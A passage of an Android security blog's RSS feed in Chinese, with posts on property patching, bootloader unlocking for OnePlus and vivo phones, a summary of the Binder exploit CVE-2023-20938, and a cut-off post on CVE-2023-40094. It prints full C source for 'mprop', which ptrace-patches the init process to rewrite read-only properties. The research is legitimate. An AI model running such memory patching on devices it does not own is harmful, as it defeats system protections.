int SystemProperties::Update(prop_info* pi, const char* value, unsigned int len) {
...
  uint32_t serial = atomic_load_explicit(&amp;amp;pi-&amp;gt;serial, memory_order_relaxed);
...
  serial |= 1;
...
  int new_serial = (len &amp;lt;&amp;lt; 24) | ((serial + 1) &amp;amp; 0xffffff);
  atomic_store_explicit(&amp;amp;pi-&amp;gt;serial, new_serial, memory_order_relaxed);
  if (have_override) {
    atomic_store_explicit(&amp;amp;override_pi-&amp;gt;serial, new_serial, memory_order_relaxed);
  }
  __futex_wake(&amp;amp;pi-&amp;gt;serial, INT32_MAX);  // Fence by side effect
  atomic_store_explicit(serial_pa-&amp;gt;serial(),
                        atomic_load_explicit(serial_pa-&amp;gt;serial(), memory_order_relaxed) + 1,
                        memory_order_release);
  if (have_override) {
    atomic_store_explicit(override_serial_pa-&amp;gt;serial(),
                          atomic_load_explicit(serial_pa-&amp;gt;serial(), memory_order_relaxed) + 1,
                          memory_order_release);
  }
  __futex_wake(serial_pa-&amp;gt;serial(), INT32_MAX);

  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;4.2. system_ext属性不一致&lt;/h2&gt;
&lt;p&gt;经验证，通过&lt;code&gt;AndroidBox&lt;/code&gt;同样可以修改&lt;code&gt;/system_ext/etc/build.prop&lt;/code&gt;中的属性。但是由于其文件属性问题，会导致与初始值不一致：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;panther:/ # ls -al /system_ext/etc/build.prop
-rw-r--r-- 1 root root 999 2009-01-01 08:00 /system_ext/etc/build.prop
panther:/ # ls -al /system/build.prop
-rw------- 1 root root 4562 2009-01-01 08:00 /system/build.prop
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;5. 挖坑&lt;/h1&gt;
&lt;p&gt;&lt;code&gt;/system/lib64/libbase.so&lt;/code&gt;的真正用途需要进一步分析&lt;/p&gt;
&lt;h1&gt;6. 参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://bbs.kanxue.com/thread-246081.htm&quot;&gt;android ro.debuggable属性调试修改(mprop逆向)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.csdn.net/jinmie0193/article/details/111355867&quot;&gt;Android修改ro.debuggable 的四种方法&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>AndroidBox-02-在Android设备运行libFuzzer</title><link>https://picoorg.github.io/posts/androidbox-02-%E5%9C%A8android%E8%AE%BE%E5%A4%87%E8%BF%90%E8%A1%8Clibfuzzer/</link><guid isPermaLink="true">https://picoorg.github.io/posts/androidbox-02-%E5%9C%A8android%E8%AE%BE%E5%A4%87%E8%BF%90%E8%A1%8Clibfuzzer/</guid><description>AndroidBox的子项目，实现灵活的libFuzzer入口。</description><pubDate>Wed, 19 Feb 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;简介&lt;/h1&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/PicoOrg/AndroidBox&quot;&gt;Android项目地址&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;说来惭愧，入门&lt;code&gt;Android&lt;/code&gt;安全研究近一年以来，仍停留在审计的初级阶段（产出较少甚至可以说毫无产出），希望能在方法上有进一步提升。同时，又想把之前最薄弱的&lt;code&gt;Fuzz&lt;/code&gt;能力补齐，因此选择了这个切入点作为第二个模块。希望能够为后来的研究者有一丝丝帮助。&lt;/p&gt;
&lt;h1&gt;使用&lt;/h1&gt;
&lt;h2&gt;编译&lt;/h2&gt;
&lt;p&gt;编译过程比较简单&lt;/p&gt;
&lt;h1&gt;工程化思路&lt;/h1&gt;
&lt;h1&gt;效果&lt;/h1&gt;
</content:encoded></item><item><title>Android逆向指路</title><link>https://picoorg.github.io/posts/android%E9%80%86%E5%90%91%E6%8C%87%E8%B7%AF/</link><guid isPermaLink="true">https://picoorg.github.io/posts/android%E9%80%86%E5%90%91%E6%8C%87%E8%B7%AF/</guid><pubDate>Tue, 05 Nov 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;1. 预备知识&lt;/h1&gt;
&lt;h2&gt;1.1. Android 版本相关&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://source.android.com/docs/setup/reference/build-numbers&quot;&gt;Android 代号、标记和 build 号&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;1.2. GKI&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;product kernel&lt;/code&gt;（也称为 &lt;code&gt;device kernel&lt;/code&gt; 或 &lt;code&gt;OEM kernel&lt;/code&gt;）是指设备上搭载的内核。在 &lt;code&gt;GKI&lt;/code&gt; 之前，&lt;code&gt;product kernel&lt;/code&gt; 受到一系列上游内核变更影响，如&lt;code&gt;Linux Long Term Supported (LTS), Linux Long Term Supported (LTS), vendor kernel&lt;/code&gt;等。这些上游修改最终导致内核代码中有多达 &lt;code&gt;50%&lt;/code&gt; 是树外代码，而非来自 &lt;code&gt;Linux&lt;/code&gt; 内核本身的迭代。在 &lt;code&gt;GKI&lt;/code&gt; 之前，几乎所有设备都具有自定义内核，而这导致了严重的内核碎片化问题。&lt;/p&gt;
&lt;p&gt;&lt;code&gt;GKI&lt;/code&gt; 通过统一核心内核并将 &lt;code&gt;SoC&lt;/code&gt; 和板级支持从核心内核移至可加载的供应商模块中，解决了内核碎片化问题。&lt;code&gt;GKI&lt;/code&gt; 还为供应商模块提供稳定的内核模块接口 (&lt;code&gt;KMI&lt;/code&gt;)，因此模块和内核可以独立进行更新。&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;版本&lt;/th&gt;
&lt;th&gt;Android 版本&lt;/th&gt;
&lt;th&gt;说明&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GKI 2.0&lt;/td&gt;
&lt;td&gt;Android 12 +&lt;/td&gt;
&lt;td&gt;在 GKI 2.0 中，发布时搭载内核版本 5.10 的设备必须附带 GKI 内核。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKI 1.0&lt;/td&gt;
&lt;td&gt;Android 11 +&lt;/td&gt;
&lt;td&gt;在 GKI 1.0 中，发布时搭载内核版本 5.4 的设备必须通过 GKI 测试。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;旧版内核&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;内核版本&amp;lt;= 4.19&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;因此选择 &lt;code&gt;GKI&lt;/code&gt; 设备可以使用较为稳定的 &lt;code&gt;root&lt;/code&gt; 解决方案，其中一种 &lt;code&gt;KernelSU&lt;/code&gt; 就是 &lt;code&gt;Android GKI&lt;/code&gt; 设备的 &lt;code&gt;root&lt;/code&gt; 解决方案，它工作在内核模式，并直接在内核空间中为用户空间应用程序授予 &lt;code&gt;root&lt;/code&gt; 权限。&lt;/p&gt;
&lt;h1&gt;2. 设备 ROOT&lt;/h1&gt;
&lt;h2&gt;2.1. OPPO&lt;/h2&gt;
&lt;p&gt;由于开放解锁的原因一般使用 &lt;code&gt;OnePlus&lt;/code&gt; 设备，选择 &lt;code&gt;GKI&lt;/code&gt; 内核刷入 &lt;code&gt;KernelSU&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;```bash
$ adb reboot bootloader
# 关闭 `bootloader` 锁定后即可进行解锁 fastboot oem unlock
$ fastboot boot android12-5.10.168_2023-05-boot.img
```
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.2. vivo&lt;/h2&gt;
&lt;p&gt;参考文章&lt;a href=&quot;https://xdaforums.com/t/how-to-unlock-bootloader-of-vivo-phones.3686690/&quot;&gt;How To Unlock Bootloader Of Vivo Phones ?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;方法一：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;```bash
# Enable Oem unlock from developer options, *#*#759*#*#
$ adb reboot bootloader
$ fastboot bbk unlock_vivo
$ fastboot vivo_bsp unlock_vivo
$ fastboot bbk lock_vivo
$ fastboot vivo_bsp lock_vivo
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;方法二：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Extract the BLUnlocker_v1.zip (You have done this already, trust me, i know you did it :)&lt;/li&gt;
&lt;li&gt;Install Qualcomm USB Driver for Qdloader 9008 mode.&lt;/li&gt;
&lt;li&gt;Get your phone, press vol up &amp;amp; down buttons together &amp;amp; connect USB at the same time.&lt;/li&gt;
&lt;li&gt;Extract your firehose file from your stock firmware (It&apos;s usually named like &apos;prog&lt;em&gt;emmc_firehose&lt;/em&gt;****.mbn&apos;) &amp;amp; place it in the current directory.&lt;/li&gt;
&lt;li&gt;Check the port number your device is connected to in WIndows Device Manager. (Looks like COM*)&lt;/li&gt;
&lt;li&gt;Double Click the &apos;dump_devinfo.bat&apos; file.&lt;/li&gt;
&lt;li&gt;Enter the port number (from step 5) &amp;amp; press enter&lt;/li&gt;
&lt;li&gt;Edit your devinfo.img using HxD Hex Editor as shown in my video (Or you can comment on my channel with a link to your devinfo.img)&lt;/li&gt;
&lt;li&gt;Double click &apos;unlock.bat&apos;&lt;/li&gt;
&lt;/ol&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Y&lt;/th&gt;
&lt;th&gt;V&lt;/th&gt;
&lt;th&gt;X&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Z&lt;/th&gt;
&lt;th&gt;U&lt;/th&gt;
&lt;th&gt;S&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;支持&lt;/td&gt;
&lt;td&gt;Y19, Y21L, Y51, Y51L, Y55L, Y55S&lt;/td&gt;
&lt;td&gt;V3&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;不支持&lt;/td&gt;
&lt;td&gt;Y15, Y17, Y35&lt;/td&gt;
&lt;td&gt;V1, V3MA, V5&lt;/td&gt;
&lt;td&gt;X9s, X9s Plus&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;不支持&lt;/td&gt;
&lt;td&gt;Y53(1606), Y65(1719), Y66&lt;/td&gt;
&lt;td&gt;V5 Lite(1609), V5s, V5 Plus(1611)&lt;/td&gt;
&lt;td&gt;X20, X20 Plus UD, X21&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;不支持&lt;/td&gt;
&lt;td&gt;Y81, Y85, Y91(1817)&lt;/td&gt;
&lt;td&gt;V7 Plus, V9(1723), V11 Pro(1804)&lt;/td&gt;
&lt;td&gt;X21 UD, X21A UD, X23&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;不支持&lt;/td&gt;
&lt;td&gt;Y95, Y20A, Y93&lt;/td&gt;
&lt;td&gt;V7(1718), V11(1806)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;未知&lt;/td&gt;
&lt;td&gt;Y11, Y21, Y22, Y30, Y31, Y69, Y71, Y83, Y1S&lt;/td&gt;
&lt;td&gt;V7 Plus(1716), V15, V15 Pro&lt;/td&gt;
&lt;td&gt;X50 Pro&lt;/td&gt;
&lt;td&gt;NEX(1805)&lt;/td&gt;
&lt;td&gt;Z3, Z5&lt;/td&gt;
&lt;td&gt;U3X, U20&lt;/td&gt;
&lt;td&gt;S1 Pro&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h1&gt;3. 调试相关&lt;/h1&gt;
&lt;p&gt;通常在用IDA调试android dex时，如果程序的debugable选项未开启，则无法进行smali调试，以往通常有两种做法：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;修改系统ro.debugable&lt;/li&gt;
&lt;li&gt;修改程序debuggable选项&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;如果采用方法一，同时可以对系统进程进行调试。&lt;/p&gt;
&lt;h2&gt;3.1. 系统调试&lt;/h2&gt;
&lt;h3&gt;3.1.1. mprop&lt;/h3&gt;
&lt;p&gt;mprop基本原理为：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;找到&lt;code&gt;init&lt;/code&gt;代码段&lt;/li&gt;
&lt;li&gt;查找静态字符串&lt;code&gt;72 6F 2E 00  == ro.\0&lt;/code&gt;，改成其他值，绕过&lt;/li&gt;
&lt;li&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;mprop源码如下&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * Copyright (C) 2018 netsniffer
 * mprop v1.0, 2017/01/19
 * https://bbs.pediy.com/thread-215311.htm
 */
 
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;ctype.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;errno.h&amp;gt;
#include &amp;lt;memory.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/ptrace.h&amp;gt;
#include &amp;lt;sys/system_properties.h&amp;gt;
 
#define PROP_NAME_MAX   32
#define PROP_VALUE_MAX  92
 
static void dump_hex(const char* buf, int len)
{
    const uint8_t *data = (const uint8_t*)buf;
    int i;
    char ascii_buf[17];
 
    ascii_buf[16] = &apos;\0&apos;;
 
    for (i = 0; i &amp;lt; len; i++) {
        int val = data[i];
        int off = i % 16;
 
        if (off == 0)
            printf(&quot;%08x  &quot;, i);
        printf(&quot;%02x &quot;, val);
        ascii_buf[off] = isprint(val) ? val : &apos;.&apos;;
        if (off == 15)
            printf(&quot; %-16s\n&quot;, ascii_buf);
    }
 
    i %= 16;
    if (i) {
        ascii_buf[i] = &apos;\0&apos;;
        while (i++ &amp;lt; 16)
            printf(&quot;   &quot;);
        printf(&quot; %-16s\n&quot;, ascii_buf);
    }
}
 
#define ORI_INST  0x2e6f72
#define HACK_INST 0x2e6f73
 
int main(int argc, char **argv) 
{
    FILE *fp;
    int  m, rc;
    int  patch_count;
    unsigned long maps, mape, addr, mlen;
    unsigned long real_val, real_vaddr;
 
    char perms[5];
    char line[512];
    char *buffer, *ro;
    char* name = NULL, *value = NULL;
 
    uint32_t tmp;
    uint32_t dest_inst = ORI_INST;
    uint32_t mod_inst = HACK_INST;
 
    int restore = 0, verbose = 0;
 
    for (m = 1; m &amp;lt; argc; m++) {
        if (argv[m] == NULL)
            continue;
 
        if (argv[m][0] != &apos;-&apos;) {
            break;
        } 
 
        if (argv[m][1] == &apos;r&apos;) {
            restore = 1;
            dest_inst = HACK_INST;
            mod_inst = ORI_INST;
        } else if (argv[m][1] == &apos;v&apos;) {
            verbose = 1;
        }
    }
 
    if (restore) {
        fprintf(stderr, &quot;restore ...\n&quot;); 
    }
    else {
        if (argc - m &amp;gt;= 2) {
            // fprintf(stderr, &quot;Usage: %s [-r] [-v] [prop_name] [prop_value]\n&quot;
            //                 &quot;e.g.:  %s ro.debuggable 1\n&quot;, argv[0], argv[0]);
            name = argv[m];
            value = argv[m+1];
        } 
        
        fprintf(stderr, &quot;start hacking ...\n&quot;); 
    }
     
    fp = fopen(&quot;/proc/1/maps&quot;, &quot;r&quot;);
    if (!fp) {
        perror(&quot;!! fopen &quot;);
        return 1;
    }
 
    // 00008000-000cb000 r-xp 00000000 00:01 6999       /init
    memset(line, 0, sizeof(line));
    while (fgets(line, sizeof(line), fp)) {
        int main_exe = (strstr(line, &quot;/init&quot;) != NULL) ? 1 : 0;
        if (main_exe) {
            rc = sscanf(line, &quot;%lx-%lx %4s &quot;, &amp;amp;maps, &amp;amp;mape, perms);
            if (rc &amp;lt; 3) {
                perror(&quot;!! sscanf &quot;);
                return 1;
            }
            if (perms[0] == &apos;r&apos; &amp;amp;&amp;amp; perms[1] == &apos;-&apos; &amp;amp;&amp;amp; perms[2] == &apos;x&apos; &amp;amp;&amp;amp; perms[3] == &apos;p&apos;) {
                break;    
            }
        }
    }
    fclose(fp);
 
    fprintf(stderr, &quot;target mapped area: 0x%lx-0x%lx\n&quot;, maps, mape); 
 
    mlen = mape - maps;
    buffer = (char *) calloc(1, mlen + 16);
    if (!buffer) {
        perror(&quot;!! malloc &quot;);
        return 1;
    }
    rc = ptrace(PTRACE_ATTACH, 1, 0, 0);
    if (rc &amp;lt; 0) {
        perror(&quot;!! ptrace &quot;);
        return rc;
    }
    for (addr = maps; addr &amp;lt; mape; addr += 4) {
        tmp = ptrace(PTRACE_PEEKTEXT, 1, (void *) addr, 0);
        *((uint32_t*)(buffer + addr - maps)) = tmp;
    }
     
    if (verbose) {
        dump_hex(buffer, mlen);
    }
   
    for (m = 0; m &amp;lt; mlen; ++m) {
        if (dest_inst == *(uint32_t*)(buffer+m)) { // 72 6F 2E 00  == ro.\0
            break;
        }
    }
 
    if (m &amp;gt;= mlen) {
        fprintf(stderr, &quot;&amp;gt;&amp;gt; inject position not found, may be already patched!\n&quot;);
    } 
    else {
        real_vaddr = maps + m;
        real_val = *(uint32_t*)(buffer+m);
        fprintf(stderr, &quot;&amp;gt;&amp;gt; patching at: 0x%lx [0x%lx -&amp;gt; 0x%08x]\n&quot;, real_vaddr, real_val, mod_inst);
         
        tmp = mod_inst;
        rc = ptrace(PTRACE_POKETEXT, 1, (void *)real_vaddr, (void*)tmp);
        if (rc &amp;lt; 0) {
            perror(&quot;!! patching failed &quot;);
        }
 
        tmp = ptrace(PTRACE_PEEKTEXT, 1, (void *)real_vaddr, 0);
        fprintf(stderr, &quot;&amp;gt;&amp;gt; %s reread: [0x%lx] =&amp;gt; 0x%08x\n&quot;, restore ? &quot;restored!&quot; : &quot;patched!&quot;, real_vaddr, tmp);       
    }
 
    free(buffer);
    rc = ptrace(PTRACE_DETACH, 1, 0, 0);
 
    if (!restore &amp;amp;&amp;amp; (name &amp;amp;&amp;amp; value &amp;amp;&amp;amp; name[0] != 0)) {
        char propbuf[PROP_VALUE_MAX];
        fprintf(stderr, &quot;-- setprop: [%s] = [%s]\n&quot;, name, value);
        __system_property_set(name, value);
        usleep(400000);
        __system_property_get(name, propbuf);
        fprintf(stderr, &quot;++ getprop: [%s] = [%s]\n&quot;, name, propbuf);
         
    }
    return rc;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;内存修改&lt;/h3&gt;
&lt;p&gt;基本原理可以参考&lt;a href=&quot;https://bbs.kanxue.com/thread-246081.htm&quot;&gt;看雪文章&lt;/a&gt;，实现方式是：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;通过附加到&lt;code&gt;init&lt;/code&gt;进程&lt;/li&gt;
&lt;li&gt;然后找到&lt;code&gt;/dev/__properties__&lt;/code&gt;所在&lt;code&gt;Segment&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;根据内存布局找到属性名位置，如&lt;code&gt;ro.debuggable&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;根据偏移找到属性值位置进行修改&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;3.2. 程序调试&lt;/h2&gt;
&lt;h1&gt;4. 参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://bbs.kanxue.com/thread-246081.htm&quot;&gt;看雪-android ro.debuggable属性调试修改(mprop逆向) &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bbs.kanxue.com/thread-215311.htm&quot;&gt;看雪-修改ro属性的小工具新版本-170119&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://security.tencent.com/index.php/opensource/detail/17&quot;&gt;BDOpener——开启APK调试与备份选项的Xposed模块&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/wpvsyou/mprop&quot;&gt;github.com/wpvsyou/mprop&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/TangGee/mprop&quot;&gt;github.com/TangGee/mprop&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.csdn.net/csfchh/article/details/136424222&quot;&gt;使用ndk-build构建可在Android设备运行的ELF可执行文件&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>攻击Android Binder：CVE-2023-20938 的分析与利用</title><link>https://picoorg.github.io/posts/cve-2023-20938/</link><guid isPermaLink="true">https://picoorg.github.io/posts/cve-2023-20938/</guid><description>本文主要翻译了Google博客内容，水平有限以理解为主。</description><pubDate>Fri, 07 Jun 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;背景&lt;/h1&gt;
&lt;p&gt;本文分析了如何利用&lt;code&gt;CVE-2023-20938&lt;/code&gt;漏洞进行&lt;code&gt;Android Binder&lt;/code&gt;攻击，该漏洞是&lt;code&gt;Binder&lt;/code&gt;设备驱动的&lt;code&gt;UAF&lt;/code&gt;漏洞，最终以非可信&lt;code&gt;APP&lt;/code&gt;在最新安卓设备上获取&lt;code&gt;root&lt;/code&gt;权限，&lt;code&gt;5.4-5.10&lt;/code&gt;版本的&lt;code&gt;GKI&lt;/code&gt;内核均受影响。&lt;/p&gt;
&lt;h2&gt;Binder&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;Binder&lt;/code&gt;是&lt;code&gt;Android&lt;/code&gt;上主要的进程间通信机制，支持进程间传递文件描述符和包含指针的对象，由用户空间库&lt;code&gt;libbinder&lt;/code&gt;和&lt;code&gt;libhwbinder&lt;/code&gt;，以及&lt;code&gt;Android&lt;/code&gt;公共内核中的内核驱动程序组成，接口可由&lt;code&gt;AIDL&lt;/code&gt;定义。&lt;code&gt;Binder&lt;/code&gt;设备驱动在&lt;code&gt;/dev/binder&lt;/code&gt;，&lt;code&gt;Andoird&lt;/code&gt;所有非可信&lt;code&gt;APP&lt;/code&gt;都经过沙盒处理，进程间通信是通过&lt;code&gt;Binder&lt;/code&gt;实现的。尤其是&lt;code&gt;Chrome&lt;/code&gt;渲染进程被分配&lt;code&gt;SELinux&lt;/code&gt;更严格的&lt;code&gt;isolated_app&lt;/code&gt;上下文，但仍然可以通过&lt;code&gt;Binder&lt;/code&gt;实现进程间通信。所以，&lt;code&gt;Binder&lt;/code&gt;呈现出更广泛的攻击面。&lt;/p&gt;
&lt;h2&gt;Binder历史漏洞&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2019-2025&lt;/li&gt;
&lt;li&gt;CVE-2019-2215&lt;/li&gt;
&lt;li&gt;CVE-2020-0041&lt;/li&gt;
&lt;li&gt;CVE-2020-0423&lt;/li&gt;
&lt;li&gt;CVE-2022-20421&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;为了实现高性能&lt;code&gt;IPC&lt;/code&gt;，&lt;code&gt;Binder&lt;/code&gt;包含极其复杂的对象生命周期、内存管理和并发线程模型。为了了解这种复杂性，我们统计了三种不同类型的并发同步原语（5个锁、6个引用计数器和一些原子变量），它们都在实现驱动程序的同一个文件中使用。出于性能原因，&lt;code&gt;Binder&lt;/code&gt;中的锁定也非常细粒度，进一步增加了代码的复杂性。&lt;/p&gt;
&lt;p&gt;近年来，利用几个&lt;code&gt;Binder&lt;/code&gt;的成功利用主要是由&lt;code&gt;UAF&lt;/code&gt;漏洞引起的。这些错误的根本原因多种多样，包括不当的清理逻辑（&lt;code&gt;CVE-2019-2215&lt;/code&gt;和&lt;code&gt;CVE-2022-20421&lt;/code&gt;）、数据竞争（&lt;code&gt;CVE-2020-0423&lt;/code&gt;）和对象越界访问（&lt;code&gt;CVE-2020-0041&lt;/code&gt;）。本博客提供了有关 UAF 问题的信息，该问题是由于处理 Binder 事务时清理实施不当而导致的引用计数错误。&lt;/p&gt;
&lt;p&gt;漏洞分析：&lt;/p&gt;
&lt;p&gt;漏洞是一个使用后释放（Use-After-Free, UAF）问题，由于在处理Binder事务时的不当清理实现导致引用计数错误。
详细分析了用户空间程序如何与Binder交互，以及如何通过特定的ioctl调用来发送和接收事务。
漏洞利用：&lt;/p&gt;
&lt;p&gt;利用UAF漏洞减少特定binder_node的引用计数，导致该对象被释放，但留下悬挂指针。
利用悬挂指针实现有限的泄漏原语（leak primitive），泄漏16字节的内核堆信息。
利用泄漏的信息实现解链原语（unlink primitive），覆盖内核内存。
结合泄漏和解链原语实现任意读取原语（arbitrary read primitive），用于识别要覆盖的内核结构的地址。
提权演示：&lt;/p&gt;
&lt;p&gt;演示了如何利用这些原语来获取root权限，包括禁用SELinux、绕过seccomp等。
漏洞修复和结论：&lt;/p&gt;
&lt;p&gt;漏洞在2023年2月和7月的Android安全公告中得到了修复。
特别感谢了多位技术专家对本文的支持和审阅。
附加信息：&lt;/p&gt;
&lt;p&gt;提供了关于如何实现任意写原语（arbitrary write primitive）的额外信息。
解释了binder_node的引用计数机制。&lt;/p&gt;
&lt;h1&gt;参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://androidoffsec.withgoogle.com/posts/attacking-android-binder-analysis-and-exploitation-of-cve-2023-20938/&quot;&gt;Attacking Android Binder: Analysis and Exploitation of CVE-2023-20938&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=U-xSM159YLI&quot;&gt;OffensiveCon24 - Eugene Rodionov,Zi Fan Tan and Gulshan Singh&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://androidoffsec.withgoogle.com/posts/attacking-android-binder-analysis-and-exploitation-of-cve-2023-20938/offensivecon_24_binder.pdf&quot;&gt;How to Fuzz Your Way to Android Universal Root&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conference.hitb.org/hitbsecconf2019ams/materials/D2T2%20-%20Binder%20-%20The%20Bridge%20to%20Root%20-%20Hongli%20Han%20&amp;amp;%20Mingjian%20Zhou.pdf&quot;&gt;Android Binder: The Bridge To Root&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=l38YQxrk7V8&quot;&gt;#HITB2019AMS D2T2 - Binder: The Bridge To Root - Hongli Han and Mingjian Zhou&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html&quot;&gt;Bad Binder: Android In-The-Wild Exploit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=TAwQ4ezgEIo&quot;&gt;OffensiveCon20 - Maddie Stone - Bad Binder: Finding an Android In The Wild 0day&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/&quot;&gt;Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Typhoon-Mangkhut-One-Click-Remote-Universal-Root-Formed-With-Two-Vulnerabilities.pdf&quot;&gt;Typhoon Mangkhut: One-click Remote Universal Root Formed with Two Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=a1vyt6iWmS4&quot;&gt;Typhoon Mangkhut: One-click Remote Universal Root Formed with Two Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://0xkol.github.io/assets/files/Racing_Against_the_Lock__Exploiting_Spinlock_UAF_in_the_Android_Kernel.pdf&quot;&gt;Racing Against the Lock: Exploiting Spinlock UAF in the Android Kernel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=E3CVDOlcHC4&quot;&gt;OffensiveCon23 - Moshe Kol - Racing Against the Lock: Exploiting Spinlock UAF in the Android Kernel&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2023-40094</title><link>https://picoorg.github.io/posts/cve-2023-40094/</link><guid isPermaLink="true">https://picoorg.github.io/posts/cve-2023-40094/</guid><pubDate>Wed, 06 Nov 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;1. 简介&lt;/h2&gt;
&lt;p&gt;过去两年来，你一直在追踪和监视一个大型洗钱网络。通过你的努力工作，你成功地在现场安插了一名特工。通过社会工程学技术，他成功获取了该网络中某个重要人物的加密钱包密码。然而，访问受到了双重身份验证的保护...&lt;/p&gt;
